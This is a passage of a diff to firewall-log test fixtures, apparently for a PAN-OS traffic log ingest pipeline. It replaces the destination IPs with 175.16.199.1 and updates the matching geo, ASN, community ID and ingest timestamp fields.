"192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14030,7 +14163,7 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -14052,7 +14185,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:Mn7w9ScywW3qjDMNsO8QsGj6BY0=" + "community_id": "1:VnasDo2kW0Vvk+m83MK6dUD18cU=" } }, "sequence_number": 32091196, @@ -14072,8 +14205,8 @@ ], "network": { "community_id": [ - "1:wOhR5YstpLgnt5WE19sGYKCmyZU=", - "1:Mn7w9ScywW3qjDMNsO8QsGj6BY0=" + "1:IIgvfZp9yUTeIpQYVcYO+SM5+ew=", + "1:VnasDo2kW0Vvk+m83MK6dUD18cU=" ], "transport": "tcp", "application": "ssl", @@ -14113,14 +14246,14 @@ ], "ip": [ "192.168.15.224", - "50.19.85.24", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 11000000000, - "ingested": "2021-09-08T12:40:05.942161813Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031883500Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -14143,30 +14276,29 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 654, - "ip": "50.19.85.24", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -14185,7 +14317,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14200,7 +14332,7 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -14222,7 +14354,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:8oAG19bm5FROhazDy0CcTH+Cfqc=" + "community_id": "1:llFrhbdT+Y/j+j3SqliVsUHzOlY=" } }, "sequence_number": 32091197, @@ -14242,8 +14374,8 @@ ], "network": { "community_id": [ - "1:6h8eY2s13iXP9cVx+C3Odlnn4+A=", - "1:8oAG19bm5FROhazDy0CcTH+Cfqc=" + "1:TUT+oGQJuH2lZ5R9kJQDVgzhW2Q=", + "1:llFrhbdT+Y/j+j3SqliVsUHzOlY=" ], "transport": "tcp", "application": "ssl", @@ -14283,14 +14415,14 @@ ], "ip": [ "192.168.15.224", - "50.19.85.24", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 11000000000, - "ingested": "2021-09-08T12:40:05.942165226Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031887800Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -14313,30 +14445,29 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 654, - "ip": "50.19.85.24", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -14355,7 +14486,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14370,7 +14501,7 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -14392,7 +14523,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:ZhVElLU1QcpGayhElc2L/+Rp+xw=" + "community_id": "1:BKgrW5Xif0BNG51T3hX117V7884=" } }, "sequence_number": 32091198, @@ -14412,8 +14543,8 @@ ], "network": { "community_id": [ - "1:/ZL4TDk4BgzLIyz/Xp1oJ9ew5cE=", - "1:ZhVElLU1QcpGayhElc2L/+Rp+xw=" + "1:NcHs8KnyCiMJadkNBNK4duVltbA=", + "1:BKgrW5Xif0BNG51T3hX117V7884=" ], "transport": "tcp", "application": "ssl", @@ -14453,14 +14584,14 @@ ], "ip": [ "192.168.15.224", - "50.19.85.24", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 11000000000, - "ingested": "2021-09-08T12:40:05.942168745Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031893300Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -14483,27 +14614,29 @@ "destination": { "nat": { "port": 443, - "ip": "104.254.150.9" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 29990, + "number": 4837, "organization": { - "name": "AppNexus, Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 7820, - "ip": "104.254.150.9", + "ip": "175.16.199.1", "packets": 10 }, "rule": { @@ -14522,7 +14655,7 @@ "packets": 12, "ip": "192.168.15.224" }, - "message": "192.168.15.224,104.254.150.9,192.168.1.63,104.254.150.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14537,7 +14670,7 @@ "destination": { "nat": { "port": 443, - "ip": "104.254.150.9" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -14559,7 +14692,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:aHhDlT3Bx285CJRrBykpRsei1a0=" + "community_id": "1:mNPaSFsPbmvnxLHzxtQF8JFWqnI=" } }, "sequence_number": 32091199, @@ -14579,8 +14712,8 @@ ], "network": { "community_id": [ - "1:xYiSF9gJFyCzwbXQPyFt8YU2J78=", - "1:aHhDlT3Bx285CJRrBykpRsei1a0=" + "1:N5/EINkZN9//TsD7qX3PTGWIdWs=", + "1:mNPaSFsPbmvnxLHzxtQF8JFWqnI=" ], "transport": "tcp", "application": "ssl", @@ -14620,14 +14753,14 @@ ], "ip": [ "192.168.15.224", - "104.254.150.9", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 11000000000, - "ingested": "2021-09-08T12:40:05.942172295Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,104.254.150.9,192.168.1.63,104.254.150.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031897500Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -14650,30 +14783,29 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 654, - "ip": "50.19.85.24", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -14692,7 +14824,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14707,7 +14839,7 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -14729,7 +14861,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:RLfRarGPGl+PnGhB8fb+S+uTX1o=" + "community_id": "1:0LjiyNeD5dfgmsuKD6RMwVWtS28=" } }, "sequence_number": 32091200, @@ -14749,8 +14881,8 @@ ], "network": { "community_id": [ - "1:QTH4ra5ZOxMb5v4tYy8DkqQsSus=", - "1:RLfRarGPGl+PnGhB8fb+S+uTX1o=" + "1:AjRcnk9elPVHpZgvFp+A0IYObog=", + "1:0LjiyNeD5dfgmsuKD6RMwVWtS28=" ], "transport": "tcp", "application": "ssl", @@ -14790,14 +14922,14 @@ ], "ip": [ "192.168.15.224", - "50.19.85.24", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 11000000000, - "ingested": "2021-09-08T12:40:05.942175777Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031901800Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -14820,30 +14952,29 @@ "destination": { "nat": { "port": 443, - "ip": "52.0.218.108" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 214, - "ip": "52.0.218.108", + "ip": "175.16.199.1", "packets": 3 }, "rule": { @@ -14862,7 +14993,7 @@ "packets": 4, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.0.218.108,192.168.1.63,52.0.218.108,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14877,7 +15008,7 @@ "destination": { "nat": { "port": 443, - "ip": "52.0.218.108" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -14899,7 +15030,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:/0iCZCsnpk+5MR4Tc26unyr/T4Q=" + "community_id": "1:FBjoTYKNjZjw4YE8HLuGOKi/UVY=" } }, "sequence_number": 32091201, @@ -14919,8 +15050,8 @@ ], "network": { "community_id": [ - "1:pRGS72RJ+/RdCMjmtcrBxdR6i9w=", - "1:/0iCZCsnpk+5MR4Tc26unyr/T4Q=" + "1:pUtVSrJwDFqPE0Yl8SNOGKCtXY8=", + "1:FBjoTYKNjZjw4YE8HLuGOKi/UVY=" ], "transport": "tcp", "application": "incomplete", @@ -14960,14 +15091,14 @@ ], "ip": [ "192.168.15.224", - "52.0.218.108", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 12000000000, - "ingested": "2021-09-08T12:40:05.942179303Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.0.218.108,192.168.1.63,52.0.218.108,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031905300Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -14990,30 +15121,29 @@ "destination": { "nat": { "port": 443, - "ip": "52.6.117.19" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 214, - "ip": "52.6.117.19", + "ip": "175.16.199.1", "packets": 3 }, "rule": { @@ -15032,7 +15162,7 @@ "packets": 4, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.6.117.19,192.168.1.63,52.6.117.19,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15047,7 +15177,7 @@ "destination": { "nat": { "port": 443, - "ip": "52.6.117.19" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -15069,7 +15199,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:486dmnLzuTH8P7j6jI6JsUtW2VU=" + "community_id": "1:QcbU0WRE/7h+0IQvZM2/UZuqbIU=" } }, "sequence_number": 32091202, @@ -15089,8 +15219,8 @@ ], "network": { "community_id": [ - "1:zaENYnP2VlZewYNuHhpqTvNAf4Y=", - "1:486dmnLzuTH8P7j6jI6JsUtW2VU=" + "1:1+bmhnIQMn7y4mTmEHPdz4onQkg=", + "1:QcbU0WRE/7h+0IQvZM2/UZuqbIU=" ], "transport": "tcp", "application": "incomplete", @@ -15130,14 +15260,14 @@ ], "ip": [ "192.168.15.224", - "52.6.117.19", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 12000000000, - "ingested": "2021-09-08T12:40:05.942183009Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.6.117.19,192.168.1.63,52.6.117.19,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031909900Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -15160,30 +15290,29 @@ "destination": { "nat": { "port": 443, - "ip": "34.238.96.22" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 214, - "ip": "34.238.96.22", + "ip": "175.16.199.1", "packets": 3 }, "rule": { @@ -15202,7 +15331,7 @@ "packets": 4, "ip": "192.168.15.224" }, - "message": "192.168.15.224,34.238.96.22,192.168.1.63,34.238.96.22,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United 